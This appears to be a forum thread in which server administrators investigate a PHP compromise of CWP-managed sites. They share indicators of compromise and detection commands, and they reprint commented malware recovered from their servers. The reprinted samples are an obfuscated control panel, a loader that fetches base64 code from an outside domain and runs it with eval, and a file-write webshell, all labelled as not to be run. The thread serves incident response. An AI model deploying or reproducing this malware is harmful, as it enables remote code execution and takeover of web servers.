[CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ

Those .c files don't appear to be IoC related to the patched CWP vulnerability. Likely they are part of another PHP injection attack -- multiple competing gangs are attempting to compromise servers on any given day. So the recommendation is to harden your PHP install right away, then engage in clean up & full postmortem.

Better to batten down the hatches rather than bailing water out of the ship...

True.
I always wanted to do my work just as developer. I've always hated servers and networks. Now my days have began!
I use to be a black hat on my teen stupid years. Now I have to pay for the karma :\

But you are right. There's an increase in attacks. This is getting ridiculous.

Those .c files don't appear to be IoC related to the patched CWP vulnerability. Likely they are part of another PHP injection attack -- multiple competing gangs are attempting to compromise servers on any given day. So the recommendation is to harden your PHP install right away, then engage in clean up & full postmortem.

Better to batten down the hatches rather than bailing water out of the ship...

.c files result of the same vulnerability no doubt. Maybe no one noticed because ".c" file is always hidden in a random directory or maybe who used this vulnerability didnt drop a backdoor for your server. I switched to cPanel/WHM after removing all the backdoors.

Where did you find those files? Inside /home or anywere else?

I also have this 198.144.182.13 IP in my logs.
Also found out that he also has created wordpress accounts, this is his data:
user: wpadminerlzp
email: wpadmin@volovmart.ru
date: 2020-06-14 00:00:00 (by looking at this 00:00:00, I assume this was SQL inserted)

Those files were on the public_html folder (or the main folder of that website)
defauit.php
defauIt.php
licelic.c

This file was in the public_html folder for some occurances, but for some occurances it was in a random directory
backup.c

This file was always hidden in some random directory.
.c(yes, just .c)

And I suggest you to check every file named "index.php" because they also add an obfuscated php code. You cant miss when you see it.

And they dont have to guess CWP username to inject code btw.

Yes but having a cPanel/WHM is kinda expensive to have it online. I would rather configure a server by myself.
The things you mostly do usually don't require a web panel.
Are you sure this .c files are from this attack or from another one? I searched and didn't find such malicious files.

What is the content of the .c file?

But yes, is related with the attack also.
The file contains a Base64 encrypted code, that do many changes in PHP files related with wordpress - theme and plugins.

I found some .c files.
I also found that there a lot of files called index.php, wp-login.php and files just called "c" (without the dot) across my websites. These files were deeply inside some folders of websites I've developed myself. Thankfully I have a clean backup and these files were not there.

licelic.c
I've decoded a "licelic.c" file and it had listed a lot of the infected websites locations encoded in base64 and some weird stuff (can't decode it directly, maybe it is written with another encode type). I copy-pasted it to Cloud.ai that decode it for me and it gave me all the urls that are infected. I tried chatgpt and it gave me nothing in return.
SO "licelic.c" is of extreme importance for you to deobfuscate and evaluate the URLs that are there. This file exposes the folders that were exploited.

Some of its contents:
Non wordpress website:
[my public url]/folder/folder/folder/index.php?MeL=1#####post_1
[my public url]/folder/folder/folder/index.php?MeL=1#####post_2
[my public url]/folder/folder/folder/index.php?MeL=1#####post_3
[my public url]/folder/folder/folder/index.php?MeL=1#####post_4
[my public url]/folder/folder/folder/index.php?MeL=1#####post_5
[my public url]/folder/folder/folder/index.php?MeL=1#####post_6
[my public url]/folder/folder/folder/index.php?MeL=1#####post_7
[my public url]/folder/folder/folder/index.php?MeL=1#####post_8
...

wordpress website:
[my public url]/folder/folder/folder/index.php/wp-login.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun

"c" file (without the dot)
"c" file (without the dot) is a zip content. You can add ".zip" to this file to open it with a zip application. Inside you get a new file that has a file called "s" that contains obfuscated php code that consists on drawing a form that probably interacts with the expoits. Maybe this is an exploit panel.
I leave the code here
(DO NOT EXECUTE THIS!!!!)

Code: [Select]

<?php
// WARNING: This is MALICIOUS code - DO NOT EXECUTE

// Checks if GET parameter "DEQ" exists
if(!isset($_GET["DEQ"])) exit;

// Function that decodes strings using indices
function Za64HUq_($TYCMzwTO, $x6Mpbe) {
    $iGRCOPT = str_split($TYCMzwTO, 1);
    $emivt51O = explode(",", $x6Mpbe);
    $gMRtx3VD = "";
    foreach($emivt51O as $v) {
        $gMRtx3VD .= $iGRCOPT[(int)$v];
    }
    return $gMRtx3VD;
}

// Static class with method to initialize arrays
class hCXKOZB {
    public static function __callStatic($name, $arguments) {
        $temarr = array(
            "puTfPFm" => array("3eolcnOp5Qf4_GqphVna1eerd2", "10,2,7,1,5"),
            "CULPcX" => array("eheriQctavFofpceulrwEpy_J5rG", "12,19,3,4,7,0"),
            "mWHO_PtG" => array("arsWrD_pcldbIoeelvh8uae4fc_K", "24,8,9,13,2,14")
        );
        foreach($temarr as $key => $v) {
            $GLOBALS[$key] = Za64HUq_($v[0], $v[1]);
        }
    }
}

// Gets values from POST (if they exist)
$vA8r0 = isset($_POST["WOjVxhQ_"]) ? trim($_POST["WOjVxhQ_"]) : "";
$oTlM_Lm47 = isset($_POST["ZXk7oVxn"]) ? trim($_POST["ZXk7oVxn"]) : "";

// Decodes the input
$n3Bi8fy = !empty($oTlM_Lm47) ? $puTfPFm($vA8r0, "w") : "";

// If there is a decoded result, writes error message and exits
if($n3Bi8fy) exit("pIUeNv1Ox74Cq0i" . $mWHO_PtG($n3Bi8fy));

// Displays HTML form with hidden fields
echo "<form method=\"POST\">";
echo "<div><input type=\"text\" name=\"WOjVxhQ_\"></div>";
echo "<div><textarea name=\"ZXk7oVxn\" rows=\"5\"></textarea></div>";
echo "<button type=\"submit\">submit</button>";
echo "</form>";
?>
index.php
This is the index.php deeply inside subfolders were the index file i've created. The root index.php file was replaced by a malicious code that executes the payload and imports my original index file.
So take a deep look on every index file you have (even sub-folders).

These files were touched (date-time changed). Mine dated 30/08/2024 23:06:51

So even if you change your panel or format your server, you'll be hacked again if you don't sanitize every website. This means going throw all files and folders and apply new rules to stop execution on folders that you don't have php files (image uploads for example).

backup.c
Zip file (change the extension to zip and open it with a zip application). It contains a new file called "back".
This file talks to the exterior. I asked cloud.ai to comment the code:
(DO NOT EXECUTE)

Code: [Select]

<?php
// MALICIOUS CODE - DO NOT EXECUTE

// Helper function that executes a function dynamically
// Used to obfuscate function calls
function sdcss($strrt,$pram_1){
return $strrt($pram_1);
}

// Main malicious function that fetches and executes remote code
// Parameters: $url = remote server URL, $time_out = connection timeout
function KmY7I3NC($url,$time_out=30){
// Check if cURL is available (preferred method)
if(sdcss("function_exists","curl_exec")){
// Initialize cURL connection
$fq8h2HYxV=curl_init();

// Set the target URL (10002 = CURLOPT_URL)
curl_setopt($fq8h2HYxV,10002,$url);

// Return transfer as string (19913 = CURLOPT_RETURNTRANSFER)
curl_setopt($fq8h2HYxV,19913,1);

// Do not verify SSL certificate (64 = CURLOPT_SSL_VERIFYPEER)
curl_setopt($fq8h2HYxV,64,false);

// Set random timeout between 30-60 seconds (13 = CURLOPT_TIMEOUT)
curl_setopt($fq8h2HYxV,13,mt_rand(30,60));

// Execute the request, decode the response (skip first character)
// and execute it as PHP code using eval()
$fhD2dN4z = evAl(base64_decode(substr(trim(curl_exec($fq8h2HYxV)),1)));

// Close cURL connection
curl_close($fq8h2HYxV);
}else{
// Fallback: use file_get_contents if cURL is not available
// Also decodes base64 and executes with eval()
$fhD2dN4z = evAl(base64_decode(substr(trim(sdcss("file_get_contents",$url),1))));
}

// Return the result of executed code
return $fhD2dN4z;
}

// Main malware trigger - checks if GET parameter "l" is set
if(isset($_GET["l"])){
    // Collect all GET parameters (with empty string as default if not set)
    $tid = isset($_GET["tid"])?$_GET["tid"]:"";
    $did = isset($_GET["did"])?$_GET["did"]:"";
    $tem = isset($_GET["tem"])?$_GET["tem"]:"";
$ck = isset($_GET["ck"])?$_GET["ck"]:"";
$usip = isset($_GET["usip"])?$_GET["usip"]:"";
$vson = isset($_GET["vson"])?$_GET["vson"]:"";
$no = isset($_GET["no"])?$_GET["no"]:"";
    
    // Build malicious URL with encoded server address
    // URL decodes to: "http://vOlOVmARTc.Ru/dai/?c=base&l=...&ck=...&usip=...&vson=...&no=...&tid=...&did=...&tem=..."
    $url = "\150\164\124\160\x3a\x2f\x2f\x76\x4f\x6c\117\x56\x6d\101\x52\124\x2e\122\165\57\x64\141\151\x2f\x3f\x63\75\142\141\x73\145\46\x6c\x3d".$_GET["l"]."&ck=".$ck."&usip=".$usip."&vson=".$vson."&no=".$no."&tid=".$tid."&did=".$did."&tem=".$tem;
    
    // Fetch remote PHP code, decode it, and execute it
    $str = KmY7I3NC($url);
}

?>
Russian URLs (I've also detected some Russian emails on my Wordpress accounts.
But it looks like the domain is off. Probably banned?

wp-login.php
It receives an URL GET parameter (?MeL=...) that is related to that "licelic.c" code inside (all URLs there have this MeL parameter). It also saves files.

(DO NOT EXECUTE THIS!)

Code: [Select]

<?php 
// WARNING: MALICIOUS CODE - DO NOT EXECUTE

// Initialize variables
$aLTZ_CWiB = false;

// Decode &#39;serialize&#39; function from concatenated string indices
// This reconstructs: s-e-r-i-a-l-i-z-e
$dseBk = (("IsSw6u")[1].("ptB7")[1].("Pa4rn")[3].("Rs87W1")[1].("nntWNs")[2].
("vgIrrw")[3])("dseBk", "GjGg9m");

$b4YsfJ = array("o0FgLZyK4ABbJHto");
$JHwES = (string) null;

// Decode &#39;wordwrap&#39; function and set word wrap to 15 characters
$aVcFqS = (("vrgwA7")[3].("kozN")[1].("wr2Hs")[1].("dQSktI")[0].
("wbrHMj")[0].("v8SZrf")[4].("cuEaA")[3].("poCzK")[0])("", 15);

// Get current date and time
$EKsO2FVW = date("Y-m-d H:i:s");

// Decode &#39;md5&#39; function
$MAsW_z = (("IsSw6u")[1].("ptB7")[1].("Pa4rn")[3].("Rs87W1")[1].
("nntWNs")[2].("vgIrrw")[3])("MAsW_z", "cGXdJI");

// Decode &#39;trim&#39; function
$zs7o1QeOh = (("U35tN")[3].("rdb9a")[0].("limY_R")[1].("ZIcamw")[4])("   ");

// Check if GET parameter "MeL" exists - if not, exit
if(!isset($_GET["MeL"])) exit;

// Check if constant is defined
$LHpbN4P2x = defined("_NYaHD");

// Get POST parameter "RfDJgIyWki" (trim it if exists)
$NiXTY2V3mC = isset($_POST["RfDJgIyWki"])?
(("U35tN")[3].("rdb9a")[0].("limY_R")[1].("ZIcamw")[4])($_POST["RfDJgIyWki"]):"";

$_blZ7fx = metaphone("moSCud");
$Jt69Gsohg = define("OL0mQ","gDrORyX");
$BMbxgE4 = false;

// Get POST parameter "xYjdx" (trim it if exists)
$V9Aqud = isset($_POST["xYjdx"])?
(("U35tN")[3].("rdb9a")[0].("limY_R")[1].("ZIcamw")[4])($_POST["xYjdx"]):"";

// If $V9Aqud is not empty, call save_file() function and exit
// This SAVES UPLOADED FILE to the server
$sf = !empty($V9Aqud)?exit("hHc1Pq7UymG5xrZgRn_".save_file($NiXTY2V3mC,$V9Aqud)):"";

// Decode another function
$dPE1i_ = (("IsSw6u")[1].("ptB7")[1].("Pa4rn")[3].("Rs87W1")[1].
("nntWNs")[2].("vgIrrw")[3])("zOEPQxj","ssMKu");

// CRITICAL FUNCTION: Saves uploaded file to disk
// Parameters: $NiXTY2V3mC = filename, $V9Aqud = file content
function save_file($NiXTY2V3mC,$V9Aqud){
    // Open file in write mode
    $handle = fopen($NiXTY2V3mC,"w");
    if($handle){
        // Write the malicious content to the file
        fwrite($handle,$V9Aqud);
        fclose($handle);
    }
    return "hHc1Pq7UymG5xrZgRn_";
}

$yXQwOmu = addslashes("yXQwOmu");

// Display HTML form (reconstructed from character indices)
// This renders an HTML form with input fields
echo ("<z01")[0].("em8fuW")[3].(... [reconstructs HTML form HTML] ...);
?>

Also found out that all the files you get distributed by the server are obfuscated differently. By this you won't be able to search for specific text. Maybe specific functions but even the functions like "goto", "ucwords" and $GLOBALS that is not commonly used but it is used a lot on these exploits.

$GLOBALS array is used to add a function (built with a string??) to the system that is afterwards executed. This allows the attacker to execute php code without using the "eval" function (I'm not sure about this part). This therm is used on all files that i saw, it might be very useful to find those exploits using this term.


Another idea:
Also search for files that start with "PK" (zipped content) and don't have the zip extension.

There are a lot of index.php files exploited. Some are close to "c" file, others are just disposed across directories.
Use this to find them:
grep -Rl --include="*index.php" 'ucwords' /home/px_disabled/public_html/


To find zipped files that have no zip extension (ignoring Microsoft Office documents):
find /home -type f ! -name '*.zip' ! -name '*.docx' ! -name '*.xlsx' ! -name '*.pptx' -exec sh -c 'head -c2 "$1" | read -r b && [ "$b" = "PK" ] && echo "$1"' _ {} \;